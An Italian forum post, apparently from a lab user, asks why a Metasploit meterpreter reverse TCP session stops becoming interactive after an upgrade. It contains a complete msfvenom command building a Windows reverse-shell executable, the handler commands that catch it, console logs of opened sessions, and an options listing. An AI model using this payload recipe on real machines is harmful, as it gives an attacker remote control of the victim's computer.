Questo potrebbe essere meglio pubblicato sul forum R7, ma sento che potrei ottenere una risposta più rapida qui mentre aspetto di accedere ai post nei loro forum.
Su un'installazione di base di Kali (versione di Metasploit 4.14.10-dev) il mio payload meterpreter funziona come un incantesimo.
La generazione del payload avviene con il seguente comando
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.10.95 lport=443 -f exe -o shell.exe
Risultato con la versione di Metasploit 4.14.10-dev
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.10.95
lhost => 192.168.10.95
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.10.95:443
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.10.95:443 -> 192.168.10.75:50484) at 2017-08-27 11:52:45 -0400
meterpreter >
Se aggiorno il database con msfupdate
e aggiorno alla versione 4.15.8-dev il risultato è simile al precedente, ma il prompt meterpreter >
non si attiva mai ei comandi non vengono eseguiti.
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.10.95
lhost => 192.168.10.95
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.10.95:443
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.10.95:443 -> 192.168.10.75:50484) at 2017-08-27 11:54:45 -0400
Qualcun altro l'ha mai incontrato prima di & sai come risolvere?
EDIT:
Output di show advanced
msf exploit(handler) > show advanced
Module advanced options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
ExitOnSession false yes Return from the exploit after a session has been created
ListenerTimeout 0 no The maximum number of seconds to wait for new sessions
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 0 no Additional delay when waiting for a session
Payload advanced options (windows/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoVerifySession true yes Automatically verify and drop invalid sessions
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 yes The number of connection attempts to try before exiting the process
StagerRetryWait 5.0 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
In risposta a void_in, sembra che la sessione meterpreter non si apra completamente. Non riesco a interagire con le sessioni o sullo sfondo di un'attività.
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.10.95
lhost => 192.168.10.95
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.10.95:443
[*] Meterpreter session 1 opened (192.168.10.95:443 -> 192.168.10.75:53518) at 2017-08-28 09:03:41 -0400
sessions -l
background